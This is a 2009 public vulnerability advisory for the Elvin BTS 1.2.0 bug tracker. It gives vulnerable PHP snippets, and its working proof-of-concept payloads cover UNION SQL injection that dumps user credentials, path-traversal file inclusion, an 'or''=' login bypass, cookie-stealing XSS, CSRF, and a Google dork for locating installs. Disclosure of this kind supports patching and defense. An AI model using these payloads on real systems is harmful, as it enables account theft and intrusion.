Elvin BTS 1.2.0 Multiple Remote Vulnerabilities

2009.06.22
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-2123 | CVE-2009-2124 | CVE-2009-2127 | CVE-2009-2129 | CVE-2009-2130
CWE: CWE-89
CWE-22
Dork: Powered by Elvin Bug Tracking Server.

[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities [+] Discovered By SirGod [+] www.mortal-team.org - Script Homepage : http://www.elvinbts.org/ - Google Dork : Powered by Elvin Bug Tracking Server. Elvin BTS suffers from a lot of vunerabilities 1) SQL Injection 2) Local File Inclusion 3) SQL Injection Login Bypass 4) Cross-Site Scripting 5) Cross-Site Request Forgery 6) Source Code Disclosure ----------------------- 1) SQL Injection ----------------------- - Vulnerable code is everywhere.I will present only 2 PoC's. a) Vulnerable code in show_bug.php $query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL"); - PoC http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile-- b) Vulnerable code in show_activity.php $query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. ""); - PoC http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile-- ----------------------- 2) Local File Inclusion ----------------------- - Vulnerable code in page.php $filename = "pages/".$_GET['id']; ................................................ if(file_exists($filename)){ include($filename); } else { echo "<h2>Sorry page cannot be found!</h2>"; } - PoC http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK ----------------------- 3) SQL Injection Login Bypass----------------------- - Code in login.php ( in login.php is included the vulnerable code) include(LoadElvinModule('login.ei')); - Vulnerable code in inc/login.ei $query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'"); - PoC Login as : Username : 'or''=' Password : 'or''=' ----------------------- 4) Cross-Site Scripting----------------------- It's more XSS's in the script,but tired to find them all. - Vulnerable code in show_activity.php <p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p> - PoC http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document.cookie)</script> ----------------------- 5) Cross-Site Request Forgery----------------------- Logout CSRF - PoC http://127.0.0.1/[path]/login.php?logout ----------------------- 6) Source Code Disclosure----------------------- Go to /inc/ directory.You will se .ei files with php code inside. That files are included and used by the script. - PoC's http://127.0.0.1/[path]/inc/login.ei http://127.0.0.1/[path]/inc/jump_bug.ei http://127.0.0.1/[path]/inc/create_account.ei Etc.. ############################################### EOF ##################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top